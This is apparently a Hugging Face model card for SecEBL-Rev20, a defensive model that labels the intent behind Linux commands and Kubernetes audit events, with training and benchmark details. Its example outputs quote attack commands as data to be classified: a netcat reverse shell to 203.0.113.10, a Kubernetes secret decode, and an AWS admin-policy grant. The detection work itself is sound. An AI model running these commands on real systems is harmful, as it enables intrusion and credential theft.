SecEBL-Rev20

SecEBL stands for Security Event Behavior Labeler.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.

Project repository: github.com/EBWi11/SecEBL

At A Glance

Area	Current release summary
Stable public API	L1 behavior-intent labeling with ranked `top_labels`.
Behavior vocabulary	361 Rev20 behavior-intent tags across 12 security behavior groups.
Training scale	86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs.
Corpus breadth	Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling.
Benchmark scale	12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream.
L1 accuracy	98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set.
Inference performance	RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s.
Training setup	`Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours.

The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.

First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:

git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL

git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

pip install -e .
scripts/run_examples.sh

After the script finishes, inspect:

runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.

What This Repository Contains

This Hugging Face repository is the model artifact bundle.

Path	Purpose
`model.safetensors`, tokenizer/config files	SentenceTransformers-compatible SecEBL-Rev20 embedding model.
`semantic_texts.jsonl`	Rev20 semantic label texts used by the L1 retrieval path.
`schema/tags_schema_rev20.json`	Canonical Rev20 behavior vocabulary, 361 tags across 12 groups.
`examples/linux/`	Public subset of the internal Linux final benchmark and matching Rev20 labels.
`examples/k8s/`	Public normalized Kubernetes AuditLog examples and matching Rev20 labels.
`examples/manifest.json`	Public example subset counts and distribution.
`rev20_tag_rfc.md`	Rev20 behavior-tag labeling RFC and boundary examples.
`l2_artifacts/logreg.joblib`	Experimental L2 logistic-regression session scorer.
`l2_artifacts/tag_risk_policy.rev20.json`	Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction.
`l2_artifacts/train_summary.json`	Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers.
`LICENSE`, `NOTICE`	Model license and attribution notices.

This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.

Output Shape

L1 predictions expose ranked top_labels:

{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}

L1 does not emit behavior_tags and does not apply a user-facing tag-selection threshold. behavior_tags[] is the field used by training and evaluation label files. Runtime prediction output is ranked top_labels.

Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.

SecEBL adds an intermediate representation:

raw security event
  -> L1 behavior-intent recognition
  -> L2 session reasoning or another downstream detector
  -> alert / review / policy

L1 intentionally does not decide that a single event is an intrusion. It produces explainable behavior evidence such as read_credential_material, execute_remote_command, create_scheduled_task, grant_cluster_privilege, or query_service_health.

This is useful for:

LOLT / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.

Data And Vocabulary

Rev20 is a flat behavior-tag schema.

Item	Count
Top-level behavior groups	12
Behavior tags	361

Schema groups:

Group	Tags
`observation_and_discovery`	51
`configuration_and_log_modification`	12
`filesystem_and_data`	33
`execution_and_process`	28
`network`	51
`identity_auth_and_secrets`	31
`persistence_services_and_storage`	27
`kernel_memory_and_tracing`	14
`package_build_and_source`	19
`database_and_infrastructure_services`	33
`containers_and_cloud_native`	34
`cloud_control_plane`	28

The release baseline was trained from internal Rev20 corpora:

Corpus	Rows	Unique behavior tags	Notes
Linux command corpus	85,277	361	Mixed generated, reviewed, and manually expanded command examples.
Kubernetes AuditLog corpus	1,008	40	Manually authored normalized K8s audit events.

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.

Training Details

The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.

Item	Value
Base model	`Alibaba-NLP/gte-modernbert-base`
Training objective	`MultipleNegativesRankingLoss` with hard-negative-aware batches
Training hardware	NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0`
Epochs	128 full-pass epochs
Batch size	112
Precision	`fp32`
Steps	1,062 steps per epoch; 135,936 total optimizer steps
Runtime	58,291 seconds, about 16.2 hours
Sequence length	160 tokens
Optimizer schedule	learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01`

Training data scale:

Training artifact	Count	Notes
Combined corpus rows	86,285	85,277 Linux command rows plus 1,008 K8s AuditLog rows.
Non-empty training observations	82,895	Rows with usable behavior labels after skipping 3,390 abstain rows.
Base command-tag pairs	117,092	Positive command/tag pairs before boundary upsampling.
Effective positive pairs	118,858	Final pair count after targeted boundary upsampling.
Behavior labels	361	Full Rev20 behavior vocabulary used on the label side.

The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.

Hard negatives were designed in two layers:

Schema-level negatives: the dataset builder used schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.

Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under examples/linux/ and normalized Kubernetes AuditLog examples under examples/k8s/.

Public artifact	Rows	Sessions	Notes
`examples/linux/example_sessions.jsonl`	10,520	531	Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows.
`examples/linux/example_gold.rev20.jsonl`	10,520	531	Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags.
`examples/k8s/example_sessions.jsonl`	144	46	Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows.
`examples/k8s/example_gold.rev20.jsonl`	144	46	Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags.

Session-level labels use English enums: normal_operation and intrusion. The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage.

Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.

Evaluation scale:

Dataset	Rows	Rows with labels	Behavior-tag instances	Unique behavior tags
Linux internal benchmark	12,594	11,889	17,287	361 / 361
K8s evaluation set	144	144	163	27 / 361
Combined	12,738	12,033	17,450	361 / 361

Retrieval quality:

Dataset	Dynamic exact	Top5 any-hit	Top5 all-covered	Micro recall@5
Linux internal benchmark	87.32%	98.49%	95.44%	96.44%
K8s evaluation set	99.31%	100.00%	100.00%	100.00%
Combined	87.47%	98.50%	95.50%	96.47%

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.

Internal Linux benchmark tag cardinality:

Tags per row	Rows
0	705
1	8,829
2	1,567
3	901
4	402
5	139
6+	51

Top internal Linux benchmark tags:

Tag	Count
`stage_temporary_path`	987
`inspect_network_state`	801
`stage_hidden_path`	655
`inspect_current_identity`	578
`read_credential_material`	551
`inspect_system_state`	481
`inspect_infrastructure_service`	390
`query_dns_records`	372
`enumerate_filesystem`	365
`search_credentials`	315

Example Outputs

These examples show the user-facing L1 output style. Scores are cosine/retrieval scores after the release prompt profile. The public helper scripts save top labels in predictions.jsonl.

Event	Top 3 L1 tags	Note
`nc -e /bin/sh 203.0.113.10 4444`	`spawn_reverse_shell` 0.811 `connect_external_service` 0.488 `spawn_bind_shell` 0.451	`-e` is recognized as reverse-shell execution.
`nc -v 203.0.113.10 443`	`connect_external_service` 0.732 `spawn_reverse_shell` 0.503 `create_reverse_tunnel` 0.412	Connection intent ranks above shell-spawn intent.
`cat /root/install.log`	`read_business_log` 0.641 `read_system_log` 0.431 `read_workload_logs` 0.385	Log-read semantics dominate.
`cat /root/install.conf`	`read_infrastructure_config` 0.620 `read_system_config` 0.612 `read_kernel_parameter` 0.336	Config-read semantics dominate.
`kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d`	`read_cluster_secret` 0.730 `decode_data` 0.716 `read_credential_material` 0.363	K8s secret extraction and decoding.
`aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess`	`grant_cloud_privilege` 0.838 `modify_cloud_identity_policy` 0.535 `modify_cloud_identity` 0.459	Cloud privilege escalation semantics.
`curl -fsS http://127.0.0.1:8080/healthz`	`query_service_health` 0.840 `inspect_local_kubernetes_cluster` 0.459 `inspect_container_runtime` 0.383	Local service health check.

Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.

Current single-card CUDA recommendation:

Setting	Value
Precision	FP16
Attention	SDPA
`max_seq_length`	160
Batch size	224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default
Sorting	`sort_by=char`
Padding	dynamic, no forced pad alignment
Output path	GPU tensor output plus GPU top-k

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

Mode	Throughput
Recommended no-cache unique inference, `bs224`	mean 5,308.72 unique cmdlines/s
Recommended no-cache latency, `bs224`	about 0.1884 ms per unique cmdline
`bs224` repeat range	5,025.47 - 5,433.78 unique cmdlines/s
Best quick-sweep point, `bs384`	5,378.45 unique cmdlines/s

Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.

L2 Artifact

This repository includes an experimental fitted L2 session scorer so the companion GitHub scripts/run_examples.sh can run the public Linux and K8s L1 examples, plus Linux example-session scoring, when this model directory is used as MODEL_DIR.

In this release, a session is a sequence of events grouped by session_id. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as intrusion or normal_operation, not a replacement for per-command behavior tags.

For compatibility with the released L2 artifact, L2 derives its session features from cached L1 top_labels using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field.

Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.

Internal L2 summary:

Check	Result
Withheld Linux session benchmark	663 sessions, 365 TP, 298 TN, 0 FP, 0 FN
7M pressure-stream fit-check	6,286,568 rows, 102,117 sessions, 61 alert sessions
OOF validation	5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall

The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.

Direct SentenceTransformers Loading

You can load the embedding model directly:

from sentence_transformers import SentenceTransformer

model = SentenceTransformer("willchen0011/SecEBL")

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k labels. For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release.

Intended Use

Research and evaluation of security-event behavior labeling.
Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
Building session-level risk scoring over SecEBL behavior-label streams.

Out Of Scope

Standalone verdicting on a single event.
Authorization or policy-compliance decisions without human validation.
Monitoring systems you are not authorized to defend.
Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.

License

The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.

The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0. Source code, schemas, public examples, public documentation, and helper scripts in the companion GitHub repository (EBWi11/SecEBL) are Apache-2.0 unless a file explicitly states otherwise. Public examples and documentation included in this Hugging Face repository follow that same companion-repository licensing unless a file explicitly states otherwise.

Commercial security offerings require a separate written commercial license.

Downloads last month: -

Safetensors

Model size

0.1B params

Tensor type

F32

Model tree for willchen0011/SecEBL

Base model

answerdotai/ModernBERT-base

Finetuned

Alibaba-NLP/gte-modernbert-base

Finetuned

(34)

this model